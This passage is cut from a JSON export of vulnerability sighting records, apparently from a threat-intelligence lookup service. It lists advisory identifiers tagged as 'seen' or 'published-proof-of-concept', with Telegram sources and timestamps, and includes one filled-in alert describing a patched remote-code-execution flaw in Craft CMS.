"Telegram/Ee7n-7zRPRepn3ksJA7_epcNvvre50B_Kcx1EKfFj33TDQI", "content": "", "creation_timestamp": "2026-03-26T21:32:41.000000Z"}, {"uuid": "680f3ea1-945a-49e0-9025-94fb590f651e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3CW-HG6R-CHFV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/14983", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46731\n\ud83d\udd25 CVSS Score: 7.3 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Craft is a content management system. Versions of Craft CMS on the 4.x branch prior to 4.14.13 and on the 5.x branch prior to 5.6.16 contains a potential remote code execution vulnerability via Twig SSTI. One must have administrator access and `ALLOW_ADMIN_CHANGES` must be enabled for this to work. Users should update to the patched versions 4.14.13 or 5.6.15 to mitigate the issue.\n\ud83d\udccf Published: 2025-05-05T19:35:31.347Z\n\ud83d\udccf Modified: 2025-05-05T20:03:42.802Z\n\ud83d\udd17 References:\n1. https://github.com/craftcms/cms/security/advisories/GHSA-7c58-g782-9j38\n2. https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv\n3. https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n4. http://github.com/craftcms/cms/pull/17026", "creation_timestamp": "2025-05-05T20:20:11.000000Z"}, {"uuid": "17d3dc8f-2d3f-4add-8c1a-89767baf0790", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQP6-54P2-M66F", "type": "seen", "source": "Telegram/t7opZ3s7Nl85xZs745vJOFh0FG2Whznv9BGbk6FzHivbIC0", "content": "", "creation_timestamp": "2026-04-07T17:29:48.000000Z"}, {"uuid": "5d28aba3-46d8-4759-950c-f6e41c65d072", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQV2-QHFH-GHCJ", "type": "seen", "source": "Telegram/t7opZ3s7Nl85xZs745vJOFh0FG2Whznv9BGbk6FzHivbIC0", "content": "", "creation_timestamp": "2026-04-07T17:29:48.000000Z"}, {"uuid": "35d69645-b8be-4fd6-b0f9-5f00e919fca5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VPWC-V33Q-MQ89", "type": "seen", "source": "Telegram/7stdzVfIjMVb7tvEQLoql-CFRLg5JIYu0eUqsXCfmQ30DI4", "content": "", "creation_timestamp": "2026-04-07T19:33:43.000000Z"}, {"uuid": "8e579677-d0d8-4e73-afb4-249722d0710a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RX8C-J7X8-W3HJ", "type": "seen", "source": "Telegram/R04Jnimv0i8bRzdrQmyXdIyX4oD8CszgjzD3ZP34LCmicTY", "content": "", "creation_timestamp": "2026-04-07T19:35:57.000000Z"}, {"uuid": "0dfface0-7eb8-4f74-b052-c30817f76fe3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H2HX-P9GP-Q7GR", "type": "seen", "source": "Telegram/R04Jnimv0i8bRzdrQmyXdIyX4oD8CszgjzD3ZP34LCmicTY", "content": "", "creation_timestamp": "2026-04-07T19:35:57.000000Z"}, {"uuid": "56fcf01c-140f-413b-92ca-bf578b234d51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9VX4-7WW7-4CF5", "type": "seen", "source": "Telegram/jEWDvJlPAzzCg6Ap5VgqQ5eCzhkM-91ZtlQ_3ivnX7ilAAw", "content": "", "creation_timestamp": "2026-04-07T21:22:14.000000Z"}, {"uuid": "7c54da78-7065-4228-88ed-a4a715b41b2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V782-6FQ4-Q827", "type": "seen", "source": "Telegram/ob3ye0FCdfhceb6CimILWC3jRIWmZERT_bGMc-OQRsW6HR0", "content": "", "creation_timestamp": "2026-04-07T23:21:25.000000Z"}, {"uuid": "de1a4cb7-470c-466f-b1c9-6f2250f929e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P29X-R292-46PP", "type": "seen", "source": "Telegram/ob3ye0FCdfhceb6CimILWC3jRIWmZERT_bGMc-OQRsW6HR0", "content": "", "creation_timestamp": "2026-04-07T23:21:25.000000Z"}, {"uuid": "c9b830f2-59be-4607-9fd6-26571031e1c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PHHP-9RM9-6GR2", "type": "seen", "source": "Telegram/ob3ye0FCdfhceb6CimILWC3jRIWmZERT_bGMc-OQRsW6HR0", "content": "", "creation_timestamp": "2026-04-07T23:21:25.000000Z"}, {"uuid": "439d9602-d397-4a51-b572-ae3da8c3ae5c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PXCJ-9PPX-G86G", "type": "seen", "source": "Telegram/ob3ye0FCdfhceb6CimILWC3jRIWmZERT_bGMc-OQRsW6HR0", "content": "", "creation_timestamp": "2026-04-07T23:21:25.000000Z"}, {"uuid": "364f1cff-ff43-40eb-bce8-a3a26e1007fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HGX2-28F8-6G2R", "type": "published-proof-of-concept", "source": "Telegram/Dv-WNIQSBfenZP-L8llbvWNomtb7L7cuRFseuDShUkzpu6g", "content": "", "creation_timestamp": "2026-03-26T19:26:19.000000Z"}, {"uuid": "e850551d-ff8c-42b9-b65f-4be48f648263", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8PRR-286P-4W7J", "type": "published-proof-of-concept", "source": "Telegram/l2CWtN20f6D8WOiAClhqJgrdc6BQljDZCBDw2ZgpHM67Hss", "content": "", "creation_timestamp": "2026-04-03T19:24:00.000000Z"}, {"uuid": "83e60777-ce77-4472-a83b-93d0d48e0cf7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-67JX-R9PV-98RJ", "type": "published-proof-of-concept", "source": "Telegram/l2CWtN20f6D8WOiAClhqJgrdc6BQljDZCBDw2ZgpHM67Hss", "content": "", "creation_timestamp": "2026-04-03T19:24:00.000000Z"}, {"uuid": "b489ccf9-2e0f-4bb9-bbbb-ca637e997ddb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QR99-7898-VR7C", "type": "published-proof-of-concept", "source": "Telegram/l2CWtN20f6D8WOiAClhqJgrdc6BQljDZCBDw2ZgpHM67Hss", "content": "", "creation_timestamp": "2026-04-03T19:24:00.000000Z"}, {"uuid": "50c10d5c-91f7-4335-aa03-bad0a964cf98", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-397M-GFHM-PMG2", "type": "published-proof-of-concept", "source": "Telegram/6UgEKYpuzuWLxLktBSFu6z7cSh4q5naaHoBaDBfOi0oKaqw", "content": "", "creation_timestamp": "2026-04-03T23:21:15.000000Z"}, {"uuid": "203d6d90-0df9-4e03-9a96-69e37b1be58a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WFMR-9HG8-JH3M", "type": "published-proof-of-concept", "source": "Telegram/6UgEKYpuzuWLxLktBSFu6z7cSh4q5naaHoBaDBfOi0oKaqw", "content": "", "creation_timestamp": "2026-04-03T23:21:15.000000Z"}, {"uuid": "67068908-7e18-4cfd-8869-7bd1b25308be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MGQC-3445-QGHQ", "type": "published-proof-of-concept", "source": "Telegram/6UgEKYpuzuWLxLktBSFu6z7cSh4q5naaHoBaDBfOi0oKaqw", "content": "", "creation_timestamp": "2026-04-03T23:21:15.000000Z"}, {"uuid": "6ee70ee5-97c3-4049-9b54-fca4f4e54e12", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JWG-CR5Q-VJQ2", "type": "published-proof-of-concept", "source": "Telegram/6UgEKYpuzuWLxLktBSFu6z7cSh4q5naaHoBaDBfOi0oKaqw", "content": "", "creation_timestamp": "2026-04-03T23:21:15.000000Z"}, {"uuid": "f4de441e-7af4-41d9-a0c3-2267cfe63107", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8HWW-W7CC-77RJ", "type": "seen", "source": "Telegram/RceOsMbVCcV6wQMI9eJfY-7gRIWU138I_3ZVebAFZlOd7ZE", "content": "", "creation_timestamp": "2026-04-07T19:34:12.000000Z"}, {"uuid": "71fb7604-5842-4ebf-9d69-cbb5cb58c1a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-693F-PF34-72C5", "type": "seen", "source": "Telegram/RceOsMbVCcV6wQMI9eJfY-7gRIWU138I_3ZVebAFZlOd7ZE", "content": "", "creation_timestamp": "2026-04-07T19:34:12.000000Z"}, {"uuid": "306285fa-1417-45b5-9e0d-3fe54f94ef87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q5G3-QHC6-PR3H", "type": "seen", "source": "Telegram/OYPeMWdUc2Y5vftM_ssiNoDYA8_06NyVd6-qxnWxvkgzfQI", "content": "", "creation_timestamp": "2026-04-07T19:34:21.000000Z"}, {"uuid": "b4fefa32-542a-43a5-9cf7-f55f1849c711", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4PH2-F6PF-79WV", "type": "seen", "source": "Telegram/OYPeMWdUc2Y5vftM_ssiNoDYA8_06NyVd6-qxnWxvkgzfQI", "content": "", "creation_timestamp": "2026-04-07T19:34:21.000000Z"}, {"uuid": "f22e09bd-8b48-4706-8528-47f998f9c3cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R9X3-WX45-2V7F", "type": "seen", "source": "Telegram/OYPeMWdUc2Y5vftM_ssiNoDYA8_06NyVd6-qxnWxvkgzfQI", "content": "", "creation_timestamp": "2026-04-07T19:34:21.000000Z"}, {"uuid": "c34d2d3c-1acb-4d7b-94cb-45685823250b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFXC-V5G9-38XR", "type": "seen", "source": "Telegram/OYPeMWdUc2Y5vftM_ssiNoDYA8_06NyVd6-qxnWxvkgzfQI", "content": "", "creation_timestamp": "2026-04-07T19:34:21.000000Z"}, {"uuid": "b1b3faae-06fa-49de-a904-58de311c5f91", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J6V9-22VQ-53VH", "type": "seen", "source": "Telegram/OYPeMWdUc2Y5vftM_ssiNoDYA8_06NyVd6-qxnWxvkgzfQI", "content": "", "creation_timestamp": "2026-04-07T19:34:21.000000Z"}, {"uuid": "3c4b5b28-d312-4235-ae83-59ac5d255244", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4RX4-4R3X-6534", "type": "seen", "source": "Telegram/OYPeMWdUc2Y5vftM_ssiNoDYA8_06NyVd6-qxnWxvkgzfQI", "content": "", "creation_timestamp": "2026-04-07T19:34:21.000000Z"}, {"uuid": "539b679e-8341-40d9-bf8f-6ee0db30c369", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FQQ6-QRCF-H7H5", "type": "seen", "source": "Telegram/MwNatB1kDaoxbS_rZihFWwC12FE1HreAtxbr2hmQcZTjcFY", "content": "", "creation_timestamp": "2026-04-07T19:35:33.000000Z"}, {"uuid": "91ab7d17-4e10-4c66-913d-8e118ea9fa37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQ86-JH52-728G", "type": "seen", "source": "Telegram/MwNatB1kDaoxbS_rZihFWwC12FE1HreAtxbr2hmQcZTjcFY", "content": "", "creation_timestamp": "2026-04-07T19:35:33.000000Z"}, {"uuid": "b78513b1-f226-494e-9f03-9d475e6cd0aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HC6G-H48V-WQVQ", "type": "seen", "source": "Telegram/MwNatB1kDaoxbS_rZihFWwC12FE1HreAtxbr2hmQcZTjcFY", "content": "", "creation_timestamp": "2026-04-07T19:35:33.000000Z"}, {"uuid": "4e0a8a73-f81d-4aa4-a186-84617e351b04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8G53-72JR-39W6", "type": "seen", "source": "Telegram/MwNatB1kDaoxbS_rZihFWwC12FE1HreAtxbr2hmQcZTjcFY", "content": "", "creation_timestamp": "2026-04-07T19:35:33.000000Z"}, {"uuid": "19837ee0-134c-41af-a5e0-c29118782525", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VWH8-X823-WJC5", "type": "seen", "source": "Telegram/MwNatB1kDaoxbS_rZihFWwC12FE1HreAtxbr2hmQcZTjcFY", "content": "", "creation_timestamp": "2026-04-07T19:35:33.000000Z"}, {"uuid": "34ee1466-a980-464d-ae3b-c94ad0b9ece1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3J3Q-WP9X-585P", "type": "published-proof-of-concept", "source": "Telegram/viJYT7gg8S3gJ-1aMGboAArF-0q_OTu7PWcGdGBWd_FKwXc", "content": "", "creation_timestamp": "2026-04-09T01:27:18.000000Z"}, {"uuid": "8fc4c733-b948-4e60-ae18-debd867d4f1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q96J-3FMM-7FV4", "type": "seen", "source": "Telegram/nE1gVyn8jRx_bZ-OhSUewb4fvVZDT-qjlGTvhk8YiMctdMk", "content": "", "creation_timestamp": "2026-04-09T11:16:38.000000Z"}, {"uuid": "46bf5be8-a2e1-4284-9c6c-f2b2615db1b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C3H3-89QF-JQM5", "type": "seen", "source": "Telegram/nE1gVyn8jRx_bZ-OhSUewb4fvVZDT-qjlGTvhk8YiMctdMk", "content": "", "creation_timestamp": "2026-04-09T11:16:38.000000Z"}, {"uuid": "2d4a89f8-5502-48ba-939c-5a6cfb73d920", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FM2X-C5QW-4H6F", "type": "seen", "source": "Telegram/nE1gVyn8jRx_bZ-OhSUewb4fvVZDT-qjlGTvhk8YiMctdMk", "content": "", "creation_timestamp": "2026-04-09T11:16:38.000000Z"}, {"uuid": "9b3dda9f-a79e-4849-bf54-8e04e07bd79a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MQ77-RV97-285M", "type": "seen", "source": "Telegram/Gog278dWyh4lEZUplneDun_VggYKWxHPgBiv3mkrQtX1ZGY", "content": "", "creation_timestamp": "2026-03-27T21:22:55.000000Z"}, {"uuid": "75279f0c-67ea-4976-b6de-74f16e8d909e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F92M-JPV7-55P2", "type": "seen", "source": "Telegram/Gog278dWyh4lEZUplneDun_VggYKWxHPgBiv3mkrQtX1ZGY", "content": "", "creation_timestamp": "2026-03-27T21:22:55.000000Z"}, {"uuid": "28fcf984-8cda-42af-b5bb-6d3b14751630", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46J8-VPX8-6P72", "type": "seen", "source": "Telegram/Gog278dWyh4lEZUplneDun_VggYKWxHPgBiv3mkrQtX1ZGY", "content": "", "creation_timestamp": "2026-03-27T21:22:55.000000Z"}, {"uuid": "7b046d4f-1ac8-46cf-ad4b-745d96e786fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W5R7-4F94-VP4C", "type": "seen", "source": "Telegram/Gog278dWyh4lEZUplneDun_VggYKWxHPgBiv3mkrQtX1ZGY", "content": "", "creation_timestamp": "2026-03-27T21:22:55.000000Z"}, {"uuid": "877d50c8-e508-4887-a965-899b2a7e9fef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-R584-6283-P7XC", "type": "seen", "source": "Telegram/Gog278dWyh4lEZUplneDun_VggYKWxHPgBiv3mkrQtX1ZGY", "content": "", "creation_timestamp": "2026-03-27T21:22:55.000000Z"}, {"uuid": "ed99dad8-de56-422c-b8c0-5481e983d3c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VCHX-5PR6-FFX2", "type": "seen", "source": "Telegram/Gog278dWyh4lEZUplneDun_VggYKWxHPgBiv3mkrQtX1ZGY", "content": "", "creation_timestamp": "2026-03-27T21:22:55.000000Z"}, {"uuid": "bf709eba-447e-4d1a-abe2-2f9b0faa311f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PWQR-WMGM-9RR8", "type": "published-proof-of-concept", "source": "Telegram/B1-lnNSHpl_GL4tzlck3EB0WXwjfJllp4cXItiyc0oKB0vU", "content": "", "creation_timestamp": "2026-03-27T21:23:14.000000Z"}, {"uuid": "0b7ec9ee-e6e8-4334-a8c6-209c6c8a04de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V8HW-MH8C-JXFC", "type": "seen", "source": "Telegram/rLqHCNltFCNj1PrF3FJbrFEjnsSClo3JgFDbDQ7L99dJsxY", "content": "", "creation_timestamp": "2026-03-27T23:27:39.000000Z"}, {"uuid": "cda84530-9293-4f98-b88f-e28ec075a1a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q9VP-3WCG-8P4X", "type": "published-proof-of-concept", "source": "Telegram/fjirMqbI7HbDe3OLZhJWgKP9i_Qtg8z94oAYRFGU8rTUaV0", "content": "", "creation_timestamp": "2026-03-30T19:17:51.000000Z"}, {"uuid": "416b23ce-55ec-4326-bfb6-6d37dfc2542d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H6C2-X2M2-MWHF", "type": "published-proof-of-concept", "source": "Telegram/fjirMqbI7HbDe3OLZhJWgKP9i_Qtg8z94oAYRFGU8rTUaV0", "content": "", "creation_timestamp": "2026-03-30T19:17:51.000000Z"}, {"uuid": "d5290fd4-0cfb-4cab-a579-efa99ebd882a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2RQ7-JQM7-W8X4", "type": "seen", "source": "Telegram/G7jwG369FM-EA8JMh95pmFocIEiy10HcnXiWAHgS3_Vj404", "content": "", "creation_timestamp": "2026-04-07T21:22:07.000000Z"}, {"uuid": "3aa5830e-f3a5-406d-a589-4b4d56fabbac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JR5X-HGM4-RRM6", "type": "seen", "source": "Telegram/G7jwG369FM-EA8JMh95pmFocIEiy10HcnXiWAHgS3_Vj404", "content": "", "creation_timestamp": "2026-04-07T21:22:07.000000Z"}, {"uuid": "55d0a941-88f7-4ebe-a117-56e05350e90c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MH2Q-Q3FH-2475", "type": "published-proof-of-concept", "source": "Telegram/UCQVBQ1wk3sWuk0eQ1N0bHldnYCTUsbgi6Jx-voi5Wevn8w", "content": "", "creation_timestamp": "2026-04-07T23:20:49.000000Z"}, {"uuid": "e46bed1d-b655-41a6-b152-489f621c89c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-436V-8FW5-4MJ8", "type": "seen", "source": "Telegram/WwaVaWmCpWfeYuJ8P8IqcUlHCUAeEgjmrCmKGvAa3A2q2J0", "content": "", "creation_timestamp": "2026-04-07T23:21:06.000000Z"}, {"uuid": "3b8d900a-43d0-4da5-8a8d-133e8a39e7fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2873", "type": "seen", "source": "Telegram/S2jczk3vE9gaoR7d4AclSyR0RpexBjnR31AlSIRf7Vdsbmk", "content": "", "creation_timestamp": "2026-04-06T15:21:35.000000Z"}, {"uuid": "63f830cf-fe1d-4b89-a515-f46e2a334c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-588R-CR5C-W6HF", "type": "seen", "source": "Telegram/Nu9QDXzNbve1iNgaEifpWzTHqsZ9MAX7l9lhuN92ZYucbK4", "content": "", "creation_timestamp": "2026-04-06T17:32:59.000000Z"}, {"uuid": "741f8934-f8a5-477b-98a6-bf922db29dbc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8H6P-M6GR-MPW9", "type": "seen", "source": "Telegram/Nu9QDXzNbve1iNgaEifpWzTHqsZ9MAX7l9lhuN92ZYucbK4", "content": "", "creation_timestamp": "2026-04-06T17:32:59.000000Z"}, {"uuid": "38dce535-0e22-4cd0-86b5-ff7e5cea2121", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MVF2-F6GM-W987", "type": "seen", "source": "Telegram/Nu9QDXzNbve1iNgaEifpWzTHqsZ9MAX7l9lhuN92ZYucbK4", "content": "", "creation_timestamp": "2026-04-06T17:32:59.000000Z"}, {"uuid": "030395f7-498c-4839-8612-d93d8053fdfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P8XC-W3Q4-H64X", "type": "seen", "source": "Telegram/Nu9QDXzNbve1iNgaEifpWzTHqsZ9MAX7l9lhuN92ZYucbK4", "content": "", "creation_timestamp": "2026-04-06T17:32:59.000000Z"}, {"uuid": "7173eca8-f5fb-4097-a2fa-5472708b8f11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8R22-62P7-9JRP", "type": "published-proof-of-concept", "source": "Telegram/nNz4AuVWmZsX2vjW9IzWDm0wIi6EKHH8QFJ1lll9JUSWJdI", "content": "", "creation_timestamp": "2026-04-06T19:28:28.000000Z"}, {"uuid": "ed6ccaa2-d921-4b59-85a5-a4f054b5e455", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P5RH-VMHP-GVCW", "type": "published-proof-of-concept", "source": "Telegram/nNz4AuVWmZsX2vjW9IzWDm0wIi6EKHH8QFJ1lll9JUSWJdI", "content": "", "creation_timestamp": "2026-04-06T19:28:28.000000Z"}, {"uuid": "99746c3b-3897-474b-b347-7156d343389d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-658G-P7JG-WX5G", "type": "published-proof-of-concept", "source": "Telegram/nNz4AuVWmZsX2vjW9IzWDm0wIi6EKHH8QFJ1lll9JUSWJdI", "content": "", "creation_timestamp": "2026-04-06T19:28:28.000000Z"}, {"uuid": "b7125c1d-5a12-46a5-a7ac-cad393fd7085", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J6V5-G24H-VG4J", "type": "published-proof-of-concept", "source": "Telegram/nNz4AuVWmZsX2vjW9IzWDm0wIi6EKHH8QFJ1lll9JUSWJdI", "content": "", "creation_timestamp": "2026-04-06T19:28:28.000000Z"}, {"uuid": "8f8f10e0-27c9-4d1c-88da-46f119c48730", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-38HG-WW64-RRWC", "type": "seen", "source": "Telegram/F-tbnQCu7KGoJ0u4OEM4TknejxA1jNnRqA-1uSHs9aPRtPw", "content": "", "creation_timestamp": "2026-04-06T23:22:19.000000Z"}, {"uuid": "e7e977a8-f9dc-4db1-ab91-a8b53eed94aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJP3-MQ3X-295M", "type": "seen", "source": "Telegram/Wq2MikHHjaMT3QcZYic1EqOjYlzbZBeR3fuLUZ6lQSb49CA", "content": "", "creation_timestamp": "2026-04-04T01:18:49.000000Z"}, {"uuid": "209455b0-2218-4d24-904f-be917dff1168", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CFH6-VR3J-QC3G", "type": "seen", "source": "Telegram/Wq2MikHHjaMT3QcZYic1EqOjYlzbZBeR3fuLUZ6lQSb49CA", "content": "", "creation_timestamp": "2026-04-04T01:18:49.000000Z"}, {"uuid": "1530b354-d950-412e-a1a8-92d5bcafb578", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98F9-FQG5-HVQ5", "type": "seen", "source": 